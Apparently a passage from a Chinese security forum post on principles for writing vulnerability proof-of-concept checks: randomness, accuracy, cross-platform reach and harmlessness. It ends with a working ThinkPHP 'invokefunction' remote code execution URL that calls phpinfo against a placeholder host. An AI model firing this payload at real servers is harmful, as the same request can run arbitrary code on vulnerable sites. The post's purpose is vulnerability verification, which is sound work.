991
1063
4315
论坛元老
随机性:Payload 中不要出现一些固定的字符或者有关个人、公司的信息,尽量使用一些随机字符来进行检测,例如一段随机字符串、一段随机字符串的 Hash 值等等。准确性:PoC 要能够从响应数据包中通过唯一确定的标识来判断漏洞是否存在,例如通过一段随机字符串的 Hash 值就比用简单的 admin 字符串好得多,因为 admin 字符串太常见了,可能漏洞不存在时响应数据包中也会出现 admin 字符串。通用性:PoC 要尽可能地使用跨平台的操作,以达到一个 PoC 可以检测 Linux、Window 等尽可能多平台的漏洞的目的。无害性:PoC 在对目标进行漏洞验证的时候,要尽量使用一些无害、无副作用的操作,一定不能对目标有不可逆的损坏。
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
使用道具 举报
本版积分规则 发表回复 回帖后跳转到最后一页
小黑屋|安全矩阵
GMT+8, 2024-11-28 01:48 , Processed in 0.015299 second(s), 18 queries .
Powered by Discuz! X4.0
Copyright © 2001-2020, Tencent Cloud.